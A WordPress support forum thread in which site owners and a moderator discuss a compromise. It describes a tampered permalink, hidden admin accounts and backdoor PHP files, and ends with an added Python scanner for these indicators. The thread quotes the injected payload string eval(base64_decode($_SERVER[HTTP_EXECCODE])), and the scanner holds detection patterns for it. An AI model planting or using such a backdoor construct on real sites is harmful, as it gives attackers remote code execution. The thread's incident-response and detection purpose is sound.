• This just started today, and I’m not certain why it is happening. At the end of any link, WP is appending the following “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/” to the end of the link.

    I’m far from an expert on WP code (I deal mostly with Drupal) so I’m not certain how WP is building links/passing the link information. The theme link is correctly set to <?php the_permalink() ?>.

    Any thoughts on why this is happening?

Viewing 15 replies - 46 through 60 (of 66 total)
  • Has anyone else seen wp-pass.php or xmlrpc.php uploaded to their FTP? I see both…should I delete or modify them? Not sure if they’re part of this hack. I was able to delete the new admin and change the permalinks, but want to fix anything else that may be broken.

    @robk30

    xmlrpc.php (in root folder) is part of the normal install of WP, but I deleted it because I do not need it personally, and it’s a potential entry point for hackers.

    wp-pass.php in /wp-content/uploads shouldn’t be there (as far as I know). Nor any PHP files in the “uploads” folder.

    Wow what a friday….

    Guys, I was running 2.8.3 and only saw that the script managed to change my permalinks. no admin user created or other things. I did see a wp-inclode.php and a fotter.php in the uploads dir. I removed those.

    My blog is acting weird. It is really slow (the admin interface) and it cannot contact akismet. anyone experiencing this since the bot attack?

    plus I’m seeing a lot more spam….

    @pielface

    I think you are the first person reporting the hack using 2.8.x

    Everyone else so far was on 2.7.x

    I wonder if the latest is actually safe if 2.8.3 is not.

    If someone could upload PHP files to your server and modify the database, I would imagine that everything else is possible.

    The admin user is hidden from you by a clever use of Javascript. Are you sure you don’t have a hidden admin?

    Hm, the index.php that was in the content folder had only this in it:

    <?php
    // Silence is golden.
    ?>

    The other file had a bunch of code.

    @dyske

    @zeppelined

    I too have an index.php in /wp-content/ with the “silence is golden”.

    I only show 1 admin (my account). under the “users” option.

    but still, the interface is slow…and no contact with akismet. I just updated to 2.8.4. no luck.

    OK scratch the latency issues.

    That was a different DNS issue.

    Looks like 2.8.x only had the permalink altered. No admin users created

    Do you guys think I should delete wp-pass.php?

    @robk30

    I deleted wp-pass.php that was in my “uploads” folder.

    I have that “Silence is Golden” uploads.php file in a few places, but not in the Uploads directory.

    Should that file be deleted?

    I am running WordPress 2.8.2
    I’ve got the updated permalink structure and the hidden administrator.
    No file uploads or modified files.

    Interesting facts:
    1st:
    I’ve got a mail from one of my readers who told me that my links don’t work. This was at 11 o’clock in the morning.
    According to the database the creation of the hidden administrator account was at 16 o’clock. So the user was created AFTER the permalink had already been changed.

    2nd: I don’t allow registrations. But I had three registrations in the previous 4 days. These user accounts seem to be “normal”; no special code in any fields.

    I’ll check the server logfiles. This could take some time.

    Should have reacted sooner.

    I have to correct myself.

    I am not sure if the register option was enabled or not.

    I found the script that is supposed to be executed by the modified permalink. This script seems to deactivate the register option.

    Still no idea how the permalink was modified.
    I’m on it.

    Seems as this is a perfect example of cross site scripting.

    I can confirm this hack worked (at least partially) on my site running 2.8.4

    There were 2 new admin accounts created but no files or permalinks were changed.

    The 2 new admin accounts were created with the javascript code embedded in their associated wp_usermeta values like we have seen so far.

    All my other 2.8.4 sites seem to be fine, but this one site was “hacked” so to speak.

    No real damage done other than the user accounts being created and the wp_usermeta values being added to hide the users from showing on the wp-admin users page.

    Just wanted to confirm that this IS affecting 2.8.4 though.

    Moderator Samuel Wood (Otto)

    (@otto42)

    I’ve analysed one of these hacked sites now, and worked out how it was done, basically. 2.8.3 fixed this particular vulnerability, and the permalink change is indeed the first step in the attack. Files are then added to the system via that route, creating more exploitable backdoors. This is a pretty standard hack methodology really: exploit to load standard hacking code from elsewhere.

    Note that the flaw requires you to allow registration on your blog. Blogs that don’t allow registration would not be vulnerable.

    The latest two versions of WordPress are NOT vulnerable to this particular attack vector. This is confirmed.

    If you don’t see the permalink change, then your blog was attacked via a different means (possibly exploiting backdoors left behind from previous intrusions before you upgraded). However, the payload and result would likely be identical, even if the method differed. Standard hacker tools tend to use the same payloads regardless of the entry method. Just shows you got hacked by the same guy as everybody else.

    Background: I am an experienced webmaster but have not spent any time with my wordpress installation. My site was compromised over the long weekend, with a handful of files modified at three different times, and a “secret” admin installed at a fourth time.

    My registrations were absolutely disabled — I needed to enable them to register a guest account so that I could then get the edit URL so then I could use the edit function on this intruder. Yet I had 5 successful registrations in the 4 days prior to being hacked, and none since.

    I had several files around the site that had malicious code inserted immediately following the opening PHP tags. I had a .htaccess file that redirected non-existent file requests to index.php changed to remove that code. I had an index.php file added.

    I had the “hidden” admin user, but I do not see any permalink code anywhere on my site. The admin user did not have an email address associated with it in the database.

    The files modified were as follows:
    /.htaccess
    /wp-load.php
    /wp-admin/link-category.php
    /wp-content/index.php
    /wp-includes/class-wp-dependencies.php
    /wp-includes/index.php (added)

    I’m not sure what version of wp I’m running, but I am running WPAU and the dashboard is suggesting I upgrade to 2.8.4

    Since I don’t seem to be affected by the permalink issue (and the wp blog on my site is dormant for all intents and purposes), I only caught this because I noticed changed files were about to be copied during my backup process.
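
An added example (not from any poster in this thread, and not WordPress code): a Python check for the file-level indicators reported above, namely PHP files under wp-content/uploads and `eval(base64_decode(` inside PHP files, plus a test for code constructs in a permalink structure value. The function names, the sample tree and its file contents are constructed for illustration.

```python
import os
import re
import tempfile

# eval(base64_decode(...)) is the construct quoted in the tampered permalink above.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
PHP_EXT = (".php", ".phtml")

def scan_wordpress_tree(root):
    """Return sorted (relative_path, reason) findings for a WordPress tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            # Media uploads should never contain executable PHP.
            if rel.startswith("wp-content/uploads/"):
                findings.append((rel, "php-in-uploads"))
            with open(full, "rb") as fh:
                if EVAL_B64.search(fh.read()):
                    findings.append((rel, "eval-base64"))
    return sorted(findings)

def permalink_is_tampered(structure):
    """True if a permalink structure value carries PHP code constructs."""
    return bool(re.search(r"eval\s*\(|base64_decode|\$_SERVER", structure, re.I))

def build_sample_tree(root):
    """Write a small constructed tree: one clean file, two suspicious, one image."""
    samples = {
        "wp-content/index.php": "<?php\n// Silence is golden.\n?>\n",
        "wp-load.php": "<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n<?php // rest\n",
        "wp-content/uploads/wp-pass.php": "<?php echo 'constructed'; ?>\n",
        "wp-content/uploads/photo.jpg": "not php",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reason in scan_wordpress_tree(tmp):
            print(f"{reason:15} {rel}")
```

The unmodified “Silence is golden” index.php is not flagged; a finding in a core file such as wp-load.php means it should be compared against a clean copy of the same WordPress release.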

  • The topic ‘WP adding code to the end of url links breaking them’ is closed to new replies.